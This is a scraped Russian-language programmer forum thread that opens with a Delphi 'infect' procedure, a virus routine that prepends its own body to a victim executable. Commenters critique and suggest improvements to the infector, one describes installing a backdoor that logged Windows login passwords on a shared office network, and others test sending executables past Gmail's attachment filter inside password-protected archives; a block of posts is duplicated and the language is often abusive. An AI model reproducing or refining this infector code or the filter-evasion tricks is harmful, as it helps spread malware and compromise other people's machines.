- 01
- 02
- 03
- 04
- 05
- 06
- 07
- 08
- 09
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
procedure infect(victim:string);
var
a:integer;
Buf: array[1..virsize] of byte;
nr,nw:longint;
begin
try
randomize;
assignfile(f1,victim);
a:=random(200);
rename(f1,'bad'+inttostr(a)) ;
filemode :=0;
assignfile(f2,paramstr(0));
reset(f2,1) ;
seek(f2,0);
blockread(f2,buf,virsize);
filemode:=2 ;
closefile(f2);
assignfile(f1,victim);
rewrite(f1,1);
blockwrite(f1,buf,virsize);
assignfile(f2,'bad'+inttostr(a));
reset(f2,1);
seek(f2,0);
repeat
BlockRead(f2, Buf,virsize, NR);
BlockWrite(f1, Buf, NR, NW);
until (NR = 0) or (NW <> NR);
closefile(f1);
closefile(f2);
deletefile(pchar('bad'+inttostr(a)))
except
end;
end;
Ксакеп, нуфф сказал.
http://www.xakep.ru/post/23374/
за такое надо руки отрывать.
Я хотел сказать, что нужно выделить 2 блока (1 равный размеру тела, 2 равный размеру жертвы) прочитать себя (уж точно не с помощью BlockRead!!), затем прочитать блок из жертвы. Затем установить файловый указатель на 0, записать себя в жертву, установить файловый указатель на размер тела и записать блок жертвы. Вот и все. То, что автор использует array вместо выделения памяти, многократно открывает/закрывает жертву, пишет в цикле (вкупе с траеблядством) говорит о его безмозглости, так как в этом случае вирус легко может испортить жертву, что может быть расценено как вредоносный функционал и повлечет для автора куда большие проблемы.
>То, что автор использует array вместо выделения памяти, многократно открывает/закрывает жертву, пишет в цикле (вкупе с траеблядством) говорит о его безмозглости
Если открыть статью по ссылке, то там каждое второе слово вызывает фейспалм, но указание именно этих трех пунктов вызывает сомнение в мозглости Stertora.
Блядская авира именно так и делает с екзешниками размером меньше 100 кб. Видимо эти тупые быдлокодеры считают, что каждый, кто сумел уложить программу в такой размер - охренеть какой кулхацкер!
Бля пиздец, я минуснул, и я хочу зайти со всех виртуалов и минуснуть, и ещё заминусовать всех, кто плюсует эту хуйню.
Кто блять назвал это дерьмо лучшим?
Вы знаете, сколько у меня проблем из-за этого дерьма? "Тарас, какой-то высер каких-то дебилов считает твою новую игру вирусом, ПОСОНЫ НЕ КАЧАЙТЕ", меня заебало блять каждый раз объяснять, что у меня вируса нет, вирус есть только в ДНК разработчиков Авиры, ЗАЕБАЛО!!!!
Просто. Удали. Ее.
Ага, злобные буратины ставят подряд все галочки, а потом жалуются, что Авира игры сносит.
Все правильно, они угрожают свободному времени... Надо тоже авиру поставить.
Нужно удалять все программы, вешая на них ярлык "потенциально опасная программа", а те, что нельзя удалить(процессы операционки) держать в сохраненном дампе.
А нельзя потому, что на распаковывание файла из оверлея и его запуск расходуется время, и это будет особенно заметно на слабых машинах( увеличение паузы перед запуском). Во-вторых, вирусу нужно как-то распространяться; в ходу всегда файлы небольшого размера, их таскают на флешках, передают с компа на комп, грузят на торренты. Глупо заражать инсталляционные пакеты и тп. громоздкости. Это нахуй никому не нужно.
Опус номер два. В коде этого недодумка есть 1 try на почти на весь код, который вдобавок никак не обрабатывается. (Возникла ошибка? Да похуй, идем дальше. Не удалось закрыть открытый файл? Нонсенс, продолжаем.)
Ну словит он исключение на этот трай, и что дальше? Запорол полтораста бинарников, заразил два?
Грузят на торренты файлы в 300кб? таскают их на флешках? Я слышал что с торрентов качают, а на флешках носят как раз инсталляционные пакеты, если уж говорить об ехе-файлах. Можно конечно сделать вирус заражающий только кейгены, но это как-то не по-какерски.
> В коде этого недодумка есть 1 try на почти на весь код, который вдобавок никак не обрабатывается.
Ну так насчет этого он сам написал - игнорим ошибки. И все правильно же, большинство ошибок будет попытками записать в файл "только для чтения".
А что, интересно, должен делать вирус если возникла ошибка - аварийно завершиться? записать информацию в лог? Процедура при возникновении исключения завершится, т.е. продолжать "портить" файл она и не будет. Честно говоря не вижу отличий от твоего кода ниже, разве что у тебя ошибки ловятся только в момент открытия, а у него - все. И да, {$I-} ты видимо не осилил.
>>И да, {$I-} ты видимо не осилил.
Мне это нах не нужно. Я принципиально не пользуюсь обертками.
Откуда уверенность что в креках и кейгенах по дефолту не интегрировано никакого зловредного кода?
Любители проприетарного софта на халяву тоже должны платить.
К примеру, аваст (и еще несколько ав, под которые есть кейгены) определяет свои кейгены как трояны, под страшными именами, вроде "win32:zlob" (к слову, один из самых опасных троянов), на поверку же оказывается, что это не более, чем хитрый умысел авторов антивируса. Кашпер вообще кейгены не палит, потому, что их и нет под него - нет смысла извираться.
P.S. А, ну да, туплю, это уже не чистый кейген.
P.P.S. Есть еще полумифическая область - white box криптография. Кто-нибудь читал работы по ней?
Обычная криптография совсем не предназначена для работы во враждебной среде. Иначе или ключ подменят на свой, или тупо отдебажат и спиздят. Т.е. DRM на чистой криптографии у тебя не получится.
А вот white box (по заверениям авторов) как раз для боевых условий. Из той лапши, которая там генерится и ключ хер выдернешь (даже симметричный), и хрен подменишь его своим.
Программа состоит из исполняемого файла (само приложение) и дополнительных файлов. Нужно установить взламываемую программу на хостовый комп и на систему в виртуалке. Затем запустить патч на виртуалке и скопировать уже обработанное приложение в его рабочую папку на хостовую систему.
"Шаганэ ты моя, Шаганэ!
Потому, что я с севера, что ли,
Я готов рассказать тебе поле,
Про волнистую рожь при луне.
Шаганэ ты моя, Шаганэ."
(С. Есенин)
Ну если там видео не конвертировать и не играться в современные игры - сойдет. Особой разницы в производительности нет.
> те же самые проблемы
Ну не совсем те же самые... Всегда можно откатить снепшот если что-то нехорошее случится. Ну и если там не держать важные файлы и пароли - то и спиздить нечего.
Короче для запуска недоверенного софта со всяких форумов и файлопомоек - само то.
для регулярной дефлорации
В принципе, у нормальной машины памяти и ядер вполне хватает, чтобы гонять 2-3 таких виртуалки одновременно.
Это есть, но если сделать из виртуалки одну большую зону - получишь то же самое, что и на реальном компе.
Ну это да, согласен.
Игори - не проблема. Я недавно настроил vga passthrough и гонял скурим в виртуалке
А на какой виртуалке?
А там при vga passthrough поди придется две видюхи юзать? Одну для виртуалки, вторую для хоста?
Да. У меня на хосте недовидия, на госте - радеон. Nvidia Quadro вроде можно разделить между гостями
Понятно... А интеграшка из проца не прокатит в качестве хостовой?
Кстати, как у этой схемы с безопасностью? Вредоносный код из виртуалки же будет иметь полный доступ к видюхе. А pci-e устройства, в свою очередь, вроде как имеют доступ к оперативе. Не позволит ли это какому-нибудь эксплойту овладеть хостом?
По идее покатит. Но есть проблема, связанная с захватом устроиств на хосте. Для nvidia-drivers был патч. Как дела обстоят с интелом(?) не знаю.
>Кстати, как у этой схемы с безопасностью? Вредоносный код из виртуалки же будет иметь полный доступ к видюхе. А pci-e устройства, в свою очередь, вроде как имеют доступ к оперативе. Не позволит ли это коду из виртуалки овладеть хостом?
IOMMU по идее не должен давать такой доступ. Да и вирусописателям проще поиметь кучу хомячков, чем возиться с багами kvm. Я не особо задумывался о безопасности, т.к. в виртуалка мне нужна только для игорей, а перезагружаться лень. То есть у меня виртуалка - это относительно доверенная среда.
Кстати, далеко не все материнки с iommu могут в проброс. Тут тоже надо гуглить истории успеха
https://www.linux.org.ru/wiki/en/User:Lindows
https://bbs.archlinux.org/viewtopic.php?id=162768
Мой проц не умеет в vt-d, да и дискретная видюха - нвидия. Так что придется и дальше жить с дуалбутом для игрушек :(
Ну да. Ну или KVM цеплять. Или моник с двумя входами, у соседа такой стоит с переключением DVI/VGA кнопкой на морде.
А от двух моников я бы не отказался, это же удобно ;) Просто сейчас стол маловат, не войдет второй моник.
Ну виртуальную видюху и vga passthrough сравнивать все-таки нечестно. С пробросом видюхи игры должны летать как-будто винда на реальном железе стоит ;)
P.S. Прошел первую мафию в виртуалбоксе, фпс стабильный, лагов и фризов не было.
что?
файл нужно открыть только 1 раз: чтобы сначала считать, а потом вписать в него инфу.
Другими словами, CreateFile в режиме Generic_Write/File_Share_Write.
код писан на коленке, прошу сильно не пинать. Также код содержит намеренные ошибки, чтобы не смущать школоло на грех окаянный.
вирусы такого типа(т.е. писаные ололо) не сохраняют при заражении иконку (к своему стыду, признаю, я тоже не умею это делать), а это большой порок.
p/s/
Я плюсанул твой пост.
Блядь, я не пойму, что за прикол такой - жить в стазисе? Это как нацисты в "Железном небе", все еще верящие в силу своего одоробла-компьютера, когда уже есть смартфоны мощнее их. Нет, я бы еще понял, если бы человек когда-то это выучил и теперь пользовался по инерции, потому что ему и так хватает (вот я пользуюсь cmd - мне оно нужно в основном для подстановки параметров программам, мне хватает), но учить этот пиздец заново вместо чего-то поактуальнее? Двач, кто эти люди, добровольно инвестирующие силы в свою профнепригодность?
Команда "format c:\" изменит мир.
Можно было, но он удалил один файл, который я мог восстановить, после чего я застремался и отрубил антивирь. Я просто так и не понял - хуле не поставить антивирь на блокирование? Зачем удалять?
Кстати, раз ставилось все раскатыванием образа, то и пароль был одинаковый. Я развлекался через pstools, грохая отдельные проги или explorer с потомками через pskill. Как то даже ухитрился поставить бекдор, пишущий в лог пароли логина шинды.
Обычно такие "товарищи" очень упертые, считают себя умнее всех, хотя на деле-ламо масдайное, даже горячие клавиши не все знают.
Дык это в худшем случае воткнуть флешку\диск и нажать пару-тройку кнопок. Восстановление с образа дело нехитрое.
http://www.cheatengine.org/forum/files/itrollu_172.gif
Всмысле? Поясни идею.
> ставится
Да нихуя там никто ставить не будет... Втыкаешь флешку, жмешь в интерфейсе того же акрониса "раскатать образ", и уходишь на полчасика курить/пить чай/играться. Через полчаса комп девственно чист и никаких вирей на нем не осталось (ну не в биос же ты ему их прошиваешь? ;). Вот и вся работа.
Административные меры всегда были надежней, чем технические.
Запрещено отсылать запароленные архивы, исполняемые и еще некоторые типы файлов.
Я заметил, что сервер пытается парсить текст письма (!) , подставляя полученные токены в качестве пароля к архиву. Он делает это с целью расшифровать запароленный архив, чтобы посмотреть, какие файлы он содержит. В частности, архив, содержащий вот такую приписку:
будет распакован и проверен.
а если зашифровать имена файлов? Походу он не распаковывает, а просто проверяет по имени файла, если находит exe-подобный внутри архива, то просто не пускает. Не обязательно даже распаковывать.
Пароль в теле письма был указан.
Посылались:
1. Исполняемый файл в открытую (не вирус).
2. Он же, запакованный в рар без пароля.
3. Он же, запакованный в рар с паролем 75545, без шифрования названий файлов (нет, в учетку на ГК пытаться входить не надо).
4. Он же, запакованный в рар с паролем 76657, без шифрования названий файлов, пароль указан в тексте письма.
5. Он же, запакованный в рар с паролем 79925, с шифрованием названий файлов, пароль в тексте не указан.
http://prntscr.com/340vla
При отправке ругнулся на .exe, остальные пришли:
http://prntscr.com/340vs6
[email protected]
Мое фейкомыло.
Да.
Правда тут уже недостаток - на другой стороне их надо переименовывать.
это если их не указывать в теле письма конечно :)
Серьезно? Нахуй этот гмейл.
gost 3 часа назад # 0
Провел тест, результат - на моем ящике Gmail не открывает архивы.
Посылались:
1. Исполняемый файл в открытую (не вирус).
2. Он же, запакованный в рар без пароля.
3. Он же, запакованный в рар с паролем 75545, без шифрования названий файлов (нет, в учетку на ГК пытаться входить не надо).
4. Он же, запакованный в рар с паролем 76657, без шифрования названий файлов, пароль указан в тексте письма.
5. Он же, запакованный в рар с паролем 79925, с шифрованием названий файлов, пароль в тексте не указан.
http://prntscr.com/340vla
При отправке ругнулся на .exe, остальные пришли:
http://prntscr.com/340vs6
<<